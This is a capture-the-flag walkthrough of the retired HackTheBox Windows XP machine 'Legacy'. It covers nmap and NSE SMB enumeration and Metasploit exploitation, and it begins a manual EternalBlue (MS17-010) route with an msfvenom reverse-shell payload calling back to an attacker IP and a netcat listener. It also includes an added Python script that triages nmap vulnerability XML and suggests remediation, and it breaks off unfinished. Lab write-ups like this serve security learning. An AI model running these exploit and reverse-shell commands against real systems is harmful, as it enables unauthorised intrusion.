Legacy

“Legacy” is a retired Windows machine on HTB. This machine allows for a one-shot quick exploit known as Eternal Blue to get root access without privilege escalation.

Legacy Info

I will begin with an nmap scan to find open ports on the machine, and the services running on them.

$ nmap -A -T4 -p- 10.10.10.4 -Pn

This is what the nmap flags stand for:

  • -A: the all-in-one option, i.e. enable OS detection, version detection, script scanning, and traceroute

  • -T4: the timing template, which tells nmap how quickly to perform the scan. Templates range from 0 (slow and stealthy) to 5 (fast and obvious).

  • -p-: scan all Transmission Control Protocol (TCP) ports, 1-65535

  • -Pn: treat all hosts as online, i.e. skip host discovery

nmap scan results

We have 2 ports open, but both are running the same service: SMB. I run the command in the image below to see if I can list any file shares, but unfortunately I cannot get a connection.

SMB Fileshare connection failed

We will perform more enumeration. I will open up msfconsole to scan for the version of SMB running on the machine.

smb_version module in msfconsole

I type options, set the rhost and then run the scanner.

results of auxiliary scanner

I do not get the SMB version running on the machine, but at least I get the OS, which is Windows XP Service Pack 3. Using this info, I go to Google and search for SMB exploits related to the OS we have on Legacy.

I find an exploit on the Rapid7 website which I will use.

After setting everything up, the rhost and lhost, I run the exploit and get back a meterpreter shell.

meterpreter shell

I can type help in my meterpreter shell to get access to commands I can run.

Sample of commands

I type in shell to get a Windows shell on the machine, and from there I navigate around to retrieve the user and root flags. There is no need for privesc since I am already NT AUTHORITY\SYSTEM on the machine.

Without Metasploit

Since we already know that only TCP ports 139 and 445 are open, we will use the Nmap Scripting Engine (NSE) to determine if they are vulnerable.

$ nmap --script vuln -p 139,445 10.10.10.4 -Pn

or (but I used the 1st one)

$ nmap -v --script 'smb-vuln*' -p 139,445 10.10.10.4 -Pn

We see that the machine is vulnerable to ms17-010, ms08-067, and CVE-2009-3103. Since we are looking for some form of Remote Code Execution (RCE) on the machine, and we already exploited ms08-067 using msfconsole, we will now attempt to use ms17-010.

The vulnerability we'll be exploiting is called Eternal Blue. It lies in Microsoft's implementation of the Server Message Block (SMB) protocol: if an attacker sends a specially crafted packet, the attacker is able to execute arbitrary code on the target machine.
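The NSE vuln scripts above produce a lot of text; when the same scan is saved with -oX, the results are structured and can be triaged automatically. The script below is an added example (not part of the original write-up) that parses that XML and lists, per host, the open ports and only the scripts whose state is VULNERABLE, together with a remediation note. The XML embedded in it is constructed for the example and modelled on the structure nmap's vulns library emits for the three findings named above; it is not real output from the Legacy machine. The REMEDIATION mapping is an assumption written for this example, not something nmap provides.

```python
"""Triage nmap vuln-script XML (nmap --script vuln -oX report.xml) into per-host findings.
The XML below is constructed for this example and modelled on the structure the
NSE 'vulns' library emits; it is not output captured from the Legacy machine."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap --script vuln -p 139,445 -oX - 10.10.10.4">
  <host>
    <status state="up"/>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
        </table>
      </script>
      <script id="smb-vuln-ms08-067">
        <table key="MS08-067">
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2008-4250</elem></table>
        </table>
      </script>
      <script id="smb-vuln-cve2009-3103">
        <table key="CVE-2009-3103">
          <elem key="title">SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2009-3103</elem></table>
        </table>
      </script>
      <script id="smb-vuln-ms10-061">
        <table key="MS10-061"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

# Remediation notes keyed by NSE script id (assumed mapping written for this example).
REMEDIATION = {
    "smb-vuln-ms17-010": "apply MS17-010 and disable SMBv1",
    "smb-vuln-ms08-067": "apply MS08-067 (Server service); the host is end-of-life, isolate it",
    "smb-vuln-cve2009-3103": "apply MS09-050 (SMBv2 negotiate handling)",
}


@dataclass
class Finding:
    script: str
    title: str
    cves: list = field(default_factory=list)


@dataclass
class HostReport:
    addr: str
    open_ports: list
    findings: list


def _findings(host_el):
    """Keep only tables whose state starts with VULNERABLE (this also matches
    'VULNERABLE (Exploitable)'); LIKELY VULNERABLE and NOT VULNERABLE are skipped."""
    out = []
    for script in host_el.iter("script"):
        for table in script.findall("table"):
            state = table.findtext("elem[@key='state']", default="")
            if not state.startswith("VULNERABLE"):
                continue
            title = table.findtext("elem[@key='title']", default=table.get("key", ""))
            cves = [e.text.split(":", 1)[1] for e in table.findall("table[@key='ids']/elem")
                    if e.text and e.text.startswith("CVE:")]
            out.append(Finding(script.get("id"), title, cves))
    return out


def parse_report(xml_text):
    """Return one HostReport per <host>, with its open TCP ports and VULNERABLE findings."""
    reports = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        ports = sorted(int(p.get("portid")) for p in host.iter("port")
                       if p.find("state") is not None and p.find("state").get("state") == "open")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        reports.append(HostReport(addr, ports, _findings(host)))
    return reports


def remediation_for(script_id):
    return REMEDIATION.get(script_id, "no note on file; review the script's advisory")


if __name__ == "__main__":
    for r in parse_report(SAMPLE_XML):
        print(f"{r.addr} open ports {r.open_ports}")
        for f in r.findings:
            print(f"  {f.script}: {f.title} {f.cves} -> {remediation_for(f.script)}")
```

Filtering on the structured state element rather than grepping the text output is what makes this reliable: the NOT VULNERABLE entry in the sample is dropped even though the word "VULNERABLE" appears in it.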

We will use this article as a reference.

Firstly, we will need to download the exploit code from GitHub.

$ git clone https://github.com/helviojunior/MS17-010.git

We will use msfvenom to create a reverse shell payload.

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe > eternalblue.exe

Once we have done that, we will set up a listener on our machine.

$ nc -lvp 1234

Now we run the exploit, which executes the payload on the victim machine. I saved mine on my Desktop.

To be continued...
